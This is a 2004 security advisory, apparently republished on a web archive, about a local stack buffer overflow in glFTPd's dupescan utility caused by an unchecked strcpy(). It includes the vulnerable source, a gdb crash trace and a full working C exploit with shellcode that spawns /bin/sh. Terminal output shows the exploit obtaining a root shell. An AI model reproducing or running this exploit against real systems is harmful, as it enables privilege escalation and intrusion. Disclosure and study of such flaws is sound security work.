Copy Link
Add to Bookmark
Report

05 - glFTPd Local Stack Buffer Overflow Vulnerability, Linux/Unix-Compatible

eZine's profile picture
Published in 
Advisory
 · 2 years ago

No System Group - Advisory #05 - 18/09/04

  • Program: glFTPd
  • Homepage: http://www.glftpd.com
  • Vulnerable Versions: glFTPd v2.00RC3 and prior
  • Risk: Low / Medium
  • Impact: Local Stack Buffer Overflow Vulnerability

DESCRIPTION

glFTPd is a very advanced ftp server with lots of possibilities. One of the main differences between many other ftp servers and glFTPd is that it has its own user database which can be completely maintained online using ftp site commands. Using ftp site commands it is also possible to see stats, view logs, execute scripts and do many more things. glFTPd runs within a chroot environment which makes it relatively safe.
The glFTPd team continuously works on improving this free piece of beautiful software.

More informations at: http://www.glftpd.com

DETAILS

This vulnerability is caused by an unsafe strcpy() that copies the entire parameter of the 'dupescan' to a stack buffer of 255 bytes.

--- dupescan.c --- 
39: int main (int argc, char *argv[]) {
40: FILE *fp;
41: char dupename[255], dupefile[255], Temp[255];
42: struct dupefile buffer;
43: if (argc == 1){
44: printf("USAGE: %s <filename>\n", argv[0]);
45: return 0;
46: }
47:
48: read_conf_datapath(Temp);
49: sprintf(dupefile, "%s/logs/dupefile", Temp);
50:
51: strcpy(dupename, argv[1]); <----- THE BUG
52: if((fp = fopen(dupefile, "r")) == NULL)
53: return 0;
54:
--- dupescan.c ---

coki@nosystem:~$ /glftpd/bin/dupescan `perl -e 'print "A" x 300'`
Done
Segmentation fault
coki@nosystem:~$

coki@nosystem:~$ gdb /glftpd/bin/dupescan
GNU gdb 6.1.1
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i486-slackware-linux"...Using host libthread_db library "/lib/libthread_db.so.1".

(gdb) r `perl -e 'print "A" x 300'`
Starting program: /glftpd/bin/dupescan `perl -e 'print "A" x 300'`
Done

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) quit
The program is running. Exit anyway? (y or n) y
coki@nosystem:~$


EXPLOIT

-------------- glFTPd-dupe_exp.c ---------------- 
/* glFTPd local stack buffer overflow exploit
(Proof of Concept)

Tested in Slackware 9.0 / 9.1 / 10.0

by CoKi <coki@nosystem.com.ar>
No System Group - http://www.nosystem.com.ar
*/


#include <stdio.h>
#include <strings.h>
#include <unistd.h>

#define BUFFER 288 + 1
#define PATH "/glftpd/bin/dupescan"

char shellcode[]=
"\xb0\x31\xcd\x80\x89\xc3\x31\xc0\xb0\x17\xcd\x80"
"\x31\xdb\x31\xc0\xb0\x17\xcd\x80"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x89\x46\x0c\x88\x46\x07"
"\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"
"\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";

int main(void) {

char *env[3] = {shellcode, NULL};
char buf[BUFFER], *path;
int *buffer = (int *) (buf);
int i;
int ret = 0xbffffffa - strlen(shellcode) - strlen(PATH);

for(i=0; i<=BUFFER; i+=4)
*buffer++ = ret;

printf("\n glFTPd local stack buffer overflow (Proof of Concept)\n");
printf(" by CoKi <coki@nosystem.com.ar>\n\n");

execle(PATH, "dupescan", buf, NULL, env);
}

-------------- glFTPd-dupe_exp.c ----------------

coki@servidor:~$ make glFTPd-dupe_exp
coki@servidor:~$ ./glFTPd-dupe_exp

glFTPd local stack buffer overflow (Proof of Concept)
by CoKi <coki@nosystem.com.ar>

Done
sh-2.05b# id
uid=0(root) gid=100(users) groups=100(users),11(floppy),17(audio),18(video),19(cdrom)
sh-2.05b#

'dupescan' is not setuid by default :(

SOLUTIONS

No yet

REFERENCES

http://www.nosystem.com.ar/advisories/advisory-05.txt

CREDITS

Discovered by CoKi <coki@nosystem.com.ar>

No System Group - http://www.nosystem.com.ar

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT